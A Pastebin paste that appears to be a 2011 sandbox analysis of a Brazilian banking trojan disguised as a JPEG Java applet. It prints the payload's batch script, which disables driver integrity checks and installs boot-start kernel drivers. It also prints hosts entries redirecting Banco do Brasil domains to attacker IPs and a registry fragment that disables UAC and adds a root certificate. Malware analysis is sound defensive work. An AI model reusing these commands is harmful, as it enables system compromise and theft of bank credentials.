Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- kaiuxSandBox $ wget -c http://mundocanibal.uol.com.br/orkut/imagens/hs/barra.jpg
- --2011-05-18 23:55:18-- http://mundocanibal.uol.com.br/orkut/imagens/hs/barra.jpg
- Resolving mundocanibal.uol.com.br... 200.147.32.122, 200.147.0.120, 200.147.0.121, ...
- Connecting to mundocanibal.uol.com.br|200.147.32.122|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 128035 (125K) [image/jpeg]
- Saving to: `barra.jpg'
- 100%[==============================================================================================================================>] 128,035 68.6K/s in 1.8s
- 2011-05-18 23:55:19 (68.6 KB/s) - `barra.jpg' saved [128035/128035]
- kaiuxSandBox $ file barra.jpg
- barra.jpg: Zip archive data, at least v2.0 to extract
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $ unzip barra.jpg
- Archive: barra.jpg
- inflating: META-INF/MANIFEST.MF
- inflating: META-INF/NOVO.SF
- inflating: META-INF/NOVO.RSA
- inflating: le.class
- inflating: a
- inflating: .project
- inflating: .classpath
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $ strings le.class
- java/applet/Applet
- serialVersionUID
- ConstantValue
- Ljava/lang/String;
- BAR1
- LIN1
- TEM1
- IPPP1
- IPP1
- IPPP2
- IPP2
- VSYS
- VSYS1
- VSYS64
- VSYS164
- BA64
- BAT64
- CMS1
- CMS64
- CMS164
- CMSS
- CMSS1
- CMSS64
- CMSS164
- URLX
- URLX1
- sann
- local_dns
- local_dnss
- dns_goo
- dns_googl
- wifi_dns
- wifi_dnss
- wifi_googl
- wifi_google
- RANDO
- IP_PH1
- IP_PH2
- JUST1
- N_ZIP
- X_ZIP
- BARRA
- PULAR
- TEMPO
- C_LIX
- C_HOST
- C_SYS
- C_SYS64
- C_JAVA
- ST_HOST
- ST_JAVA
- aaaooo
- <clinit>
- Code
- java/lang/String
- <init>
- ([B)V
- LineNumberTable
- LocalVariableTable
- java/lang/Math
- random
- hs_err_pid_0x00001
- java/lang/StringBuilder
- valueOf
- (I)Ljava/lang/String;
- (Ljava/lang/String;)V
- .tmp
- append
- -(Ljava/lang/String;)Ljava/lang/StringBuilder;
- toString
- ()Ljava/lang/String;
- java/lang/System
- getProperty
- &(Ljava/lang/String;)Ljava/lang/String;
- &(Ljava/lang/Object;)Ljava/lang/String;
- WINDOWS
- system32
- drivers
- hosts
- java.home
- security
- java.policy
- this
- Lle;
- paint
- (Ljava/awt/Graphics;)V
- java/awt/Color
- darkGray
- Ljava/awt/Color;
- java/awt/Graphics
- setColor
- (Ljava/awt/Color;)V
- drawString
- (Ljava/lang/String;II)V
- Ljava/awt/Graphics;
- Pausar
- (I)V
- currentTimeMillis
- StackMapTable
- H32A
- '(Ljava/lang/String;Ljava/lang/String;)V
- java/io/File
- exists
- java/net/URL
- openConnection
- ()Ljava/net/URLConnection;
- java/net/URLConnection
- getInputStream
- ()Ljava/io/InputStream;
- java/io/BufferedInputStream
- (Ljava/io/InputStream;)V
- java/io/FileOutputStream
- java/io/BufferedOutputStream
- (Ljava/io/OutputStream;)V
- write
- read
- flush
- close
- java/io/IOException
- URLexterna
- SalvarComo
- files
- Ljava/io/File;
- Ljava/net/URL;
- connection
- Ljava/net/URLConnection;
- stream
- Ljava/io/InputStream;
- Ljava/io/BufferedInputStream;
- file
- Ljava/io/FileOutputStream;
- Ljava/io/BufferedOutputStream;
- java/io/InputStream
- H32C
- HostURL
- H31S
- java/io/FileWriter
- (Ljava/io/File;Z)V
- Local
- Dados
- filewriter
- Ljava/io/FileWriter;
- H32F
- java/io/FileInputStream
- (Ljava/io/File;)V
- java/io/OutputStream
- ([BII)V
- ([B)I
- java/io/FileNotFoundException
- Destino
- Ljava/io/OutputStream;
- H32B
- java/lang/Runtime
- getRuntime
- ()Ljava/lang/Runtime;
- exec
- '(Ljava/lang/String;)Ljava/lang/Process;
- valor
- H24D
- java/lang/Object
- getClass
- ()Ljava/lang/Class;
- java/lang/Class
- getResourceAsStream
- )(Ljava/lang/String;)Ljava/io/InputStream;
- H24Z
- java/util/zip/ZipFile
- entries
- ()Ljava/util/Enumeration;
- java/util/Enumeration
- nextElement
- ()Ljava/lang/Object;
- java/util/zip/ZipEntry
- /(Ljava/util/zip/ZipEntry;)Ljava/io/InputStream;
- getName
- (Ljava/io/OutputStream;I)V
- ([BII)I
- hasMoreElements
- zipname
- xDir
- zipFile
- Ljava/util/zip/ZipFile;
- enumeration
- Ljava/util/Enumeration;
- zipEntry
- Ljava/util/zip/ZipEntry;
- size
- buffer
- os.name
- Windows
- contains
- (Ljava/lang/CharSequence;)Z
- ProgramFiles(x86)
- getenv
- os.arch
- indexOf
- (Ljava/lang/String;)I
- eh64
- FFexists
- user.home
- endsWith
- (Ljava/lang/String;)Z
- Application Data
- Mozilla
- Firefox
- Dados de aplicativos
- AppData
- Roaming
- profiles.ini
- GetFFdir
- java/lang/Exception
- U_HOME
- STR1
- STR2
- STR3
- arq1
- arq2
- arq3
- java/io/DataInputStream
- java/io/BufferedReader
- java/io/InputStreamReader
- (Ljava/io/Reader;)V
- Path=(.*)
- java/util/regex/Pattern
- compile
- -(Ljava/lang/String;)Ljava/util/regex/Pattern;
- matcher
- 3(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
- java/util/regex/Matcher
- find
- group
- replace
- (CC)Ljava/lang/String;
- cert_override.txt
- readLine
- Where
- fstream
- Ljava/io/FileInputStream;
- Ljava/io/DataInputStream;
- Ljava/io/BufferedReader;
- strLine
- Filtrar
- Ljava/util/regex/Pattern;
- Buscar
- Ljava/util/regex/Matcher;
- ProfilesDIR
- toLowerCase
- windows 7
- Windows7
- windows vista
- WindowsVista
- windows xp
- WindowsXP
- windows nt
- WindowsNT
- H922
- ((Ljava/lang/String;Ljava/lang/Boolean;)V
- java/lang/Boolean
- booleanValue
- Ccmd /c %tmp%\bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS
- ,cmd /c %tmp%\bcdedit.exe -set TESTSIGNING ON
- cmd /c del %tmp%\aaa.bat
- estrutura
- Ljava/lang/Boolean;
- init
- windows
- ,cmd /c mkdir c:\windows\syswow64\drivers\etc
- (Z)Ljava/lang/Boolean;
- &estrutura=
- (Z)Ljava/lang/StringBuilder;
- SourceFile
- le.java
- kaiuxSandBox $ file a
- a: Zip archive data, at least v2.0 to extract
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $
- kaiuxSandBox $ unzip a
- Archive: a
- inflating: plusdriver.sys
- inflating: plusdriver64.sys
- inflating: aaa.bat
- inflating: add.reg
- inflating: bcdedit.exe
- inflating: cert_override.txt
- ##### Interesting about plusdriver.sys
- c:\sys\32\objchk_wxp_x86\i386\ag02.pdb
- 216.155.133.236 www2.bancobrasil.com.br
- 216.155.133.237 aapj.bb.com.br
- 127.0.0.1 localhost
- Hosts doWindows
- Exemplo:
- 127.0.0.1 www.microsof.com.br
- RtlInitUnicodeString
- kaiuxSandBox $
- kaiuxSandBox $ cat aaa.bat
- @echo off
- @break off
- cmd /c %tmp%\\bcdedit.exe -set loadoptions DDISABLE_INTEGRITY_CHECKS
- cmd /c %tmp%\\bcdedit.exe -set TESTSIGNING ON
- cmd /c copy %tmp%\\plusdriver64.sys %windir%\\SysWOW64\\drivers
- cmd /c copy %tmp%\\plusdriver.sys %windir%\\System32\\drivers
- cmd /c sc create driverusbplus64 binPath= "SysWOW64\drivers\plusdriver64.sys" group= "Act Plus Group" type= kernel start= boot error= normal DisplayName= "driverusbplus64"
- cmd /c sc create driverusbplus binPath= "System32\drivers\plusdriver.sys" group= "Act Plus Group" type= kernel start= boot error= normal DisplayName= "driverusbplus"
- cmd /c del %tmp%\\aaa.bat
- cmd /c del %tmp%\\plusdriver64.sys
- cmd /c del %tmp%\\plusdriver.sys
- cmd /c del %tmp%\\add.reg
- cmd /c del %tmp%\\bcdedit.exe
- cmd /c del %tmp%\\cert_override.txt
- ##### Trying to change Root' Cert?
- kaiuxSandBox $ cat add.reg
- .....
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
- "EnableLUA"=dword:00000000
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\26ED6B892DA143F2A6B9E036C5CDDF85CBC0765D]
- "Blob"=hex:04,00,00,00,01,00,00,00,10,00,00,00,77,b4,55,9c,b0,8a,a6,19,b8,8b,\
- .....
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
